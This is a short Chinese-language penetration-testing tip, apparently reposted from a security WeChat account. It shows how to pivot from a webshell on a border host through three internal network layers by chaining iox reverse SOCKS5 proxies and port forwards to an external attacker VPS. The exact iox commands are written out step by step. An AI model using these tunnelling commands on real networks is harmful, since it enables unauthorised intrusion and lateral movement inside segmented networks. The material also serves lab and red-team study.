Tips +1
一层反向连接
我们通过漏洞获取边界主机centos7的webshell,发现该主机可以出网,第二层网络不出网,现在我们通过使用IOX工具搭建socks5反向代理,对第二层网络进行渗透
1、VPS上 使用iox 监听9999端口和1080端口,第一个端口用来接受边界主机流量,第二个端口则是将流量转发给本地1080。
iox.exe proxy -l 9999 -l 1080
2、边界主机连接VPS,将流量转发给VPS的端口
iox.exe proxy -r 111.111.111.111:9999
3、kali 配置socks5客户端进行测试,成功访问到第二层网络主机
可以看到客户端将请求给vps 的1080端口,然后通过socks5隧道转发给内网第二层网络。
二层反向连接
通过第一层socks5代理我们获取第二层网络主机Ubuntu的权限,接下来需要搭建第二层socks5反向代理,对第三层网络进行渗透。
1、VPS上 使用iox 监听10000端口和1080端口,第一个端口用来接受边界主机流量,第二个端口则是将流量转发给本地1080。
iox.exe proxy -l 10000 -l 1080
2、边界主机上,监听20000端口用于接受第二层网络主机的流量,并将流量通过10000端口转发给VPS监听的10000端口
iox.exe fwd -l 20000 -r vpsip:10000
3、在第二层网络主机上开启socks5代理,将流量转发给第一层网络的20000端口
4、最后,我们在攻击机器配置socks5代理。访问成功。
浏览器挂上代理,同样访问成功。
三层反向连接
1、VPS上 使用iox 监听10000端口和1080端口,第一个端口用来接受边界主机流量,第二个端口则是将流量转发给本地1080。
iox.exe proxy -l 10000 -l 1080
2、边界主机上,监听20000端口用于接受第二层网络主机的流量,并将流量通过10000端口转发给VPS监听的10000端口
iox.exe fwd -l 20000 -r vpsip:10000
3、第二层网络主机同上步操作,监听30000端口用于接受第三层网络主机流量,并将流量通过20000端口转发给第一层网络边界主机的20000端口。
4、在第三层网络主机上开启socks5代理,将流量转发给第二层网络的30000端口
4、最后,我们在攻击机器配置socks5代理。访问成功。
整个数据流向是:SOCKS V5 → (1080 → 10000 →20000 →30000) → 192.168.44.200
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【Tips+1】IOX 反向穿透四层网段
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论